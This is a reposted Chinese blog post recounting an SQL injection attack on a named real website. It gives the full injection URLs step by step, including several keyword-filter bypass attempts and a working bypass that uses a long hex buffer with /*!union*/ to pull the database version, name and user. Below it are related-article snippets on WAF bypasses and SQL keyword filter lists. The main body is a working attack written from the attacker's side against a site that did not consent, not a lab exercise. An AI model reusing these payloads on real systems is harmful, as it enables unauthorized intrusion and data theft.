一个突破SQL注入关键词过滤的另类方法

SQL注入技巧与突破
最新推荐文章于 2022-04-24 08:19:07 发布
最新推荐文章于 2022-04-24 08:19:07 发布
阅读量180 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/alocne/archive/2012/03/24/2415531.html
本文详细介绍了通过多种方法突破SQL注入过滤限制的过程,包括利用特殊字符、绕过UNION+SELECT等技巧,并最终借助国外黑客论坛成功解决问题。分享了从常规手法到高级技巧的实践过程,展示了SQL注入攻击的复杂性和应对策略。

前几今天遇到一个bt 的注射点(此注入点使用目前流行的注射工具都射不了):

http://xuehai.net/index.php?content=more_product&id=17
http://xuehai.net/index.php?content=more_product&id=17 and 1=1 正常
http://xuehai.net/index.php?content=more_product&id=17 and 1=2 报错

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

http://xuehai.net/index.php?content=more_product&id=17 order by 6 正常
http://xuehai.net/index.php?content=more_product&id=17 order by 7 错误

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

继续按照常规的手法注射:

http://xuehai.net/index.php?content=more_product&id=-17+UNION+SELECT+1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

错误nnd,过滤了UNION+SELECT 我们来加点特殊的字符看看能不能绕过:

http://xuehai.net/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

悲剧还是绕不过去 – -,于是尝试自己知道的绕过方法继续射…

http://xuehai.net/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

继续:

http://xuehai.net/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+concat(s,e,l,e,c,t)+all+1,2,3,4,5,6–

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

http://xuehai.net/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-

如图:

突破SQL注入过滤限制

突破SQL注入过滤限制

靠,老外果然牛B 那么继续射

http://xuehai.net/index.php?content=more_product&id=-17 and (select 1)=(select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6–+-

如图:成功得到系统版本、当前数据库用户、用户名

突破SQL注入过滤限制

突破SQL注入过滤限制

至此终于成功突破SQL注入过滤Union+SELECT。

转载于:https://www.cnblogs.com/alocne/archive/2012/03/24/2415531.html

mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 981
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
注入过滤关键字
12-21
注入过滤关键字
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
mysql过滤关键字_sql注入的一些新发现,突破关键字过滤
weixin_30852391的博客
01-28 497
直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。引申一下,只用%0d能...
SQL注入:关键字过滤
quan610232785的博客
11-18 2668
SQL注入:关键字过滤sql参数过滤逻辑代码 sql参数过滤 对网络上普遍的都是直接对关键字进行替换,是实际上mysql关键字不区分大小写,在sql执行中,select、SELECT、Select的效果是一致的。网络上的普遍过滤效果不佳,自己写了一个工具类进行过滤。 逻辑 关键字前后有空格才算是有效待过滤的,以防过滤正常的参数 通过全部小写进行匹配,匹配后通过获得下标 通过下标以及匹配的关键对传入的参数进行下标用空格替换 去除前后空格 代码 package com.platform.common.uti
sql注入过滤关键字
天道酬勤
04-24 917
正则表达式:[^(and|exec|union|create|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|xp_|or|%27|%20|--)*?] 备注--正则过不了也不知道为什么
sql注入关键字过滤1
weixin_43345082的博客
06-24 1070
做了一道sql的练习,学到了一个姿势 i春秋的题目 题目是关键字过滤 过滤了order select 等关键字 我们用<>关键字 到四没有数据,说明只有三列 只有第二列有回显 爆库 爆表 爆列 flag ...
MySQL解决SQL注入另类方法详解
09-10
本文主要探讨一些非传统的、另类方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,就存在SQL注入的风险。例如,一个简单的查询模板是: ```sql select * from T where f1...
SQL注入防范的另类思路.pdf
09-19
整体而言,《SQL注入防范的另类思路》一文提出了通过技术措施、管理措施和用户教育等多个方面来增强Web应用程序的SQL注入防护能力。通过实施这些措施,可以在应用程序和数据库层面构建多层防御机制,从而有效地降低...
SQL注入过滤程序v1.0:增强网站安全性
总结以上各点,SQL注入过滤程序v1.0是一个为Web应用提供防御SQL注入功能的工具,它具有记录和封禁非法尝试者IP地址的能力,能够通过管理员动态更新过滤规则和禁止列表,同时保证了管理员账户的安全性。这对于需要...
SQL注入过滤程序 v1.0
12-05
对非法注入,提交的信息进行详细的记录,方便...对3次注入以上的自动封注入者Ip功能,这个次数可以自己设置; 加入完善的过滤函数,在线修改过滤函数,自由添加和修改禁止登陆的IP地址; 管理员口令加密;默认密码为 xyxiao
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
sql注入过滤关键字(union select等等)
没事我溜达
03-15 9480
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
SQL注入:突破关键字过滤
weixin_30597269的博客
05-04 813
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。   引申一下...
sql注入关键字过滤_在MSSQL注入中学到的新姿势
weixin_39878247的博客
12-09 590
0x01 前言在一次MSSQL注入过程中,目标WEB应用过滤了substring()且不能使用AND、OR语句。通过查询SQL Server官方手册,然后自己利用其它函数的组合,实现了一个新的字符串截取方法。0x02 注入由于该注入点已经修复,所以无法复现,就简单复述一下前期的测试过程。目标WEB程序过滤了一些常见的SQL注入关键字例如:SELECT、AND、CHAR()等,但是目标WE...
过滤关键字大全-网页关键字过滤-sql注入关键字过滤
eee365的专栏
08-30 1339
using System;using System.Collections.Generic;using System.Text;using System.Text.RegularExpressions;using System.Web;using System.Security.Cryptography;public class Input{
sql注入关键字过滤_过滤in,or字符的sql注入学习
weixin_39696518的博客
12-09 842
sql注入中,有时候会遇见一些过滤,将in或者or之类的匹配出来,这样传统的通过information_schema是得不出来列名的。这里引入一个sys的一个表可以看到这里有很多表名。这里有很多$符号的表名,这些表单里面就存在很多信息。这里就出现了我创建的一个表。这里还可以用select table_name from sys.x$schema_table_statistics whe...
过滤sql注入关键字
ZHOU7605的博客
09-20 1105
//过滤sql注入关键字 function filter_sql($str){ if (empty($str)) return false; $str = htmlspecialchars($str); $str = str_replace( '/', "", $str); $str = str_r...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值